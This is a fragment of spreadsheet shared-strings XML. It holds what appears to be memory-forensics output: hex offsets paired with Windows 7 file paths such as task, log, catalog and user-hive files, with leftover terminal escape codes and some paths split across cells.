  <si>
    <t>\Windows\System32\LogFiles\Scm\c2f5f7f6-e939-4f42-ad93-2ddcdc598863_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d1360</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\c28ede63-4aca-473f-9e83-983de682e6a6_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d15d8</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Support\MPLog-07132009-215552.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d19e8</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Setup.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d1be8</t>
  </si>
  <si>
    <t>0xdf5d2728</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Application Experience\AitAgent_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d2898</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\authui.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d2db0</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d3368</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Registry\RegIdleBackup_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d3588</t>
  </si>
  <si>
    <t>0xdf5d4698</t>
  </si>
  <si>
    <t>0xdf5d49b8</t>
  </si>
  <si>
    <t>0xdf5d4af0</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\de52a724-1fad-42dc-aaf3-ec43fb64955c_x001B_[0K_x001B_[28G</t>
  </si>
  <si>
    <t>0xdf5d4da0</t>
  </si>
  <si>
    <t>0xdf5d4e58</t>
  </si>
  <si>
    <t>0xdf5d5448</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d5910</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\d21f6024-191f-4454-bbbc-09a650da2549_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d59c8</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\d622195c-d680-4fea-9c56-59660c7c9e94_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d6c98</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\OCURActivate_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d73f8</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\dff0fa94-99d4-4b3d-a873-ebd8f902343d_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d74b0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\pcasvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d79a0</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d7c90</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d7d48</t>
  </si>
  <si>
    <t>\Windows\System32\dps.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d8148</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d85e8</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\e3d7b4c7-dee3-439a-b29f-b7fc6651df77_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d86a0</t>
  </si>
  <si>
    <t>0xdf5d8eb8</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\e14a80af-80cc-4254-bda2-c73744d7ea30_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d9830</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5da168</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Caches\cversions.2.db_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5dabf0</t>
  </si>
  <si>
    <t>0xdf5dba10</t>
  </si>
  <si>
    <t>0xdf5dc9b8</t>
  </si>
  <si>
    <t>\Windows\System32\FDResPub.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5dde48</t>
  </si>
  <si>
    <t>0xdf5de3e0</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000</t>
  </si>
  <si>
    <t>00000b.db_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5de890</t>
  </si>
  <si>
    <t>0xdf5deb30</t>
  </si>
  <si>
    <t>0xdf5df340</t>
  </si>
  <si>
    <t>0xdf5dfb80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\propsys.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5e0958</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000</t>
  </si>
  <si>
    <t>000002.db_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5e1390</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5e1778</t>
  </si>
  <si>
    <t>0xdf5e1998</t>
  </si>
  <si>
    <t>0xdf5e1a50</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.app.json_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5e2210</t>
  </si>
  <si>
    <t>\Windows\System32\WSDApi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5e6610</t>
  </si>
  <si>
    <t>\Users\sshd_server\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5e68c0</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\f6086458-2911-423f-bcaa-5736b6060004_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5e7478</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Diagnosis\events10.rbs_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5e79b8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\vdrvroot.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5e7a70</t>
  </si>
  <si>
    <t>0xdf5e86d0</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Diagnosis\events01.rbs_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5e8ad8</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Diagnosis\events00.rbs_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5e9670</t>
  </si>
  <si>
    <t>\keysvc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5e9728</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\f93c7104-998a-4a38-b935-775a3138b3c3_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5ea278</t>
  </si>
  <si>
    <t>\Users\sshd_server\NTUSER.DAT_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5eb720</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Task Manager\Interactive_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5eb8a0</t>
  </si>
  <si>
    <t>\Windows\System32\ssdpapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5ebd48</t>
  </si>
  <si>
    <t>0xdf5ebe00</t>
  </si>
  <si>
    <t>0xdf5ec038</t>
  </si>
  <si>
    <t>\Users\sshd_server\ntuser.dat.LOG1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5ec580</t>
  </si>
  <si>
    <t>\Users\sshd_server\ntuser.dat.LOG2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5ed308</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ServiceModel.Discovery.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5ed960</t>
  </si>
  <si>
    <t>\Windows\System32\RdpGroupPolicyExtension.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5edcd0</t>
  </si>
  <si>
    <t>0xdf5ee038</t>
  </si>
  <si>
    <t>0xdf5eebe8</t>
  </si>
  <si>
    <t>0xdf5ef038</t>
  </si>
  <si>
    <t>\Windows\System32\stdole2.tlb_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f01b0</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Location\Notifications_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f0690</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Diagnosis\events11.rbs_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f0f80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\batt.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f3498</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f3550</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\Microsoft-Windows-VAN.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f36a0</t>
  </si>
  <si>
    <t>0xdf5f3bf8</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\Microsoft-Windows-NCSI.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f3f80</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\Microsoft-Windows-IE-F12-Provider.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f4320</t>
  </si>
  <si>
    <t>0xdf5f43d8</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\Microsoft-Windows-IE-HTMLRendering.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f45c0</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\Microsoft-Windows-Documents-Events.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f53c0</t>
  </si>
  <si>
    <t>\Windows\System32\wlansvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f5bb8</t>
  </si>
  <si>
    <t>\TermSrv_API_service_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f5f38</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\MSVCP100.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f6488</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\DXP-DeviceExperience.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f6670</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\DisplaySwitch.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f6b10</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\Display.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f6ec8</t>
  </si>
  <si>
    <t>0xdf5f6f80</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\DiagCpl.Events.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f7038</t>
  </si>
  <si>
    <t>0xdf5f7a10</t>
  </si>
  <si>
    <t>0xdf5f7c18</t>
  </si>
  <si>
    <t>0xdf5f8428</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\boost_system-vc100-mt-1_49.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f8760</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\nwifi.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f8970</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\nwifi.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f8b78</t>
  </si>
  <si>
    <t>0xdf5f8c30</t>
  </si>
  <si>
    <t>\Windows\System32\umrdp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f8e18</t>
  </si>
  <si>
    <t>\Windows\System32\SessEnv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f9258</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\VolumeControl.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f9890</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\UIAutomationCore.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f9a90</t>
  </si>
  <si>
    <t>0xdf5f9cc8</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\timedate.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5f9f80</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\Wlansvc.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5fa348</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\themecpl.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5fa780</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\taskmgr.events.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5faa68</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\userplugplayetw.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5fac00</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\DHCPQEC.DLL.MUI_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5fc190</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\ADIsoDLL.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5fc378</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\WinlogonEvents.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5fc8e0</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\WinINet.ETW.ptxml_x001B_[0K_x001B_[69G</t>
  </si>
  <si>
    <t>0xdf5fca48</t>
  </si>
  <si>
    <t>0xdf5fcd80</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\wdc.events.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5fd640</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5fdae0</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\eac3b25a-fb01-4df0-922f-6fe21bd3a99a_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5fe038</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\en-US\cimwin32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5fe268</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\advapi32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5fedd8</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\WMI\RtBackup\EtwRTDiagtrack-Listener.etl_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5ffcc0</t>
  </si>
  <si>
    <t>0xdf600300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-PlatformUpd</t>
  </si>
  <si>
    <t>ate-Win7-SRV0</t>
  </si>
  <si>
    <t>8R2-Package</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~da-DK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6006e0</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~bg-BG~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf600820</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~en-US~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6009f8</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~ar-SA~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf600d10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-PhotoBasicP</t>
  </si>
  <si>
    <t>ackage~31bf38</t>
  </si>
  <si>
    <t>56ad364e35~</t>
  </si>
  <si>
    <t>x86~~6</t>
  </si>
  <si>
    <t>.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf600e50</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~cs-CZ~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6019b0</t>
  </si>
  <si>
    <t>\Windows\System32\inetpp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf602588</t>
  </si>
  <si>
    <t>\Windows\System32\whhelper.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf604aa0</t>
  </si>
  <si>
    <t>\Windows\System32\spoolss.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf604ec8</t>
  </si>
  <si>
    <t>\Windows\System32\winipsec.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf604f80</t>
  </si>
  <si>
    <t>\Windows\System32\authfwcfg.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6053f0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\WSDMon.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf605948</t>
  </si>
  <si>
    <t>\Windows\System32\fdPnp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf606448</t>
  </si>
  <si>
    <t>\Windows\System32\wsnmp32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf607100</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft-windows-qos_31bf3856ad364e35_6.1.7600.16385_none_ae21b</t>
  </si>
  <si>
    <t>eb3b8f83754.m</t>
  </si>
  <si>
    <t>0xdf609320</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~et-EE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf609638</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~es-ES~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf609950</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~en-GB~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf609a90</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~fr-FR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf609c68</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~el-GR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf609f80</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~de-DE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60a190</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~lv-LV~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60a368</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~hu-HU~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60a680</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~hr-HR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60a998</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~hi-IN~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60aad8</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~it-IT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60acb0</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~he-IL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60af80</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~fi-FI~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60b300</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~nl-NL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60b440</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~pt-PT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60b778</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~nb-NO~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60b950</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~lt-LT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60bc68</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~ko-KR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60bf80</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~ja-JP~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60c2c0</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~sk-SK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60c5d8</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~ru-RU~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60c8f0</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~ro-RO~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60caf8</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~sl-SI~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60ccd0</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~pt-BR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60cf80</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~pl-PL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60d258</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~zh-CN~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60d638</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~tr-TR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60d778</t>
  </si>
  <si>
    <t>~31bf3</t>
  </si>
  <si>
    <t>856ad364e35~x86~ar-SA~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60d950</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~th-TH~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60dc68</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~sv-SE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60dda8</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~uk-UA~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60df80</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~sr-LATN-CS~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60e2f0</t>
  </si>
  <si>
    <t>856ad364e35~x86~cs-CZ~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60e608</t>
  </si>
  <si>
    <t>856ad364e35~x86~bg-BG~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60e920</t>
  </si>
  <si>
    <t>vel~31bf3856ad364e35~x86~~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60ea60</t>
  </si>
  <si>
    <t>856ad364e35~x86~de-DE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60ec38</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~zh-TW~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60eee8</t>
  </si>
  <si>
    <t>P~31bf3856ad364e35~x86~zh-HK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60f148</t>
  </si>
  <si>
    <t>856ad364e35~x86~hi-IN~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60f320</t>
  </si>
  <si>
    <t>856ad364e35~x86~es-ES~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60f638</t>
  </si>
  <si>
    <t>856ad364e35~x86~en-US~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60f950</t>
  </si>
  <si>
    <t>856ad364e35~x86~en-GB~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60fa90</t>
  </si>
  <si>
    <t>856ad364e35~x86~et-EE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60fc68</t>
  </si>
  <si>
    <t>856ad364e35~x86~el-GR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf60ff80</t>
  </si>
  <si>
    <t>856ad364e35~x86~da-DK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf610300</t>
  </si>
  <si>
    <t>856ad364e35~x86~hu-HU~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf610440</t>
  </si>
  <si>
    <t>856ad364e35~x86~ko-KR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf610778</t>
  </si>
  <si>
    <t>856ad364e35~x86~hr-HR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf610950</t>
  </si>
  <si>
    <t>856ad364e35~x86~he-IL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf610c68</t>
  </si>
  <si>
    <t>856ad364e35~x86~fr-FR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf610f80</t>
  </si>
  <si>
    <t>856ad364e35~x86~fi-FI~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf611278</t>
  </si>
  <si>
    <t>856ad364e35~x86~nb-NO~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf611590</t>
  </si>
  <si>
    <t>856ad364e35~x86~lv-LV~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6116d0</t>
  </si>
  <si>
    <t>856ad364e35~x86~nl-NL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6118a8</t>
  </si>
  <si>
    <t>856ad364e35~x86~lt-LT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf611c68</t>
  </si>
  <si>
    <t>856ad364e35~x86~ja-JP~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf611f80</t>
  </si>
  <si>
    <t>856ad364e35~x86~it-IT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf612228</t>
  </si>
  <si>
    <t>856ad364e35~x86~sk-SK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf612608</t>
  </si>
  <si>
    <t>856ad364e35~x86~ro-RO~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf612748</t>
  </si>
  <si>
    <t>856ad364e35~x86~th-TH~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf612920</t>
  </si>
  <si>
    <t>856ad364e35~x86~pt-PT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf612c38</t>
  </si>
  <si>
    <t>856ad364e35~x86~pt-BR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf612d78</t>
  </si>
  <si>
    <t>856ad364e35~x86~ru-RU~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf612ee8</t>
  </si>
  <si>
    <t>856ad364e35~x86~pl-PL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf613288</t>
  </si>
  <si>
    <t>856ad364e35~x86~uk-UA~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6135a0</t>
  </si>
  <si>
    <t>856ad364e35~x86~tr-TR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6138b8</t>
  </si>
  <si>
    <t>856ad364e35~x86~sv-SE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6139f8</t>
  </si>
  <si>
    <t>856ad364e35~x86~zh-HK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf613bd0</t>
  </si>
  <si>
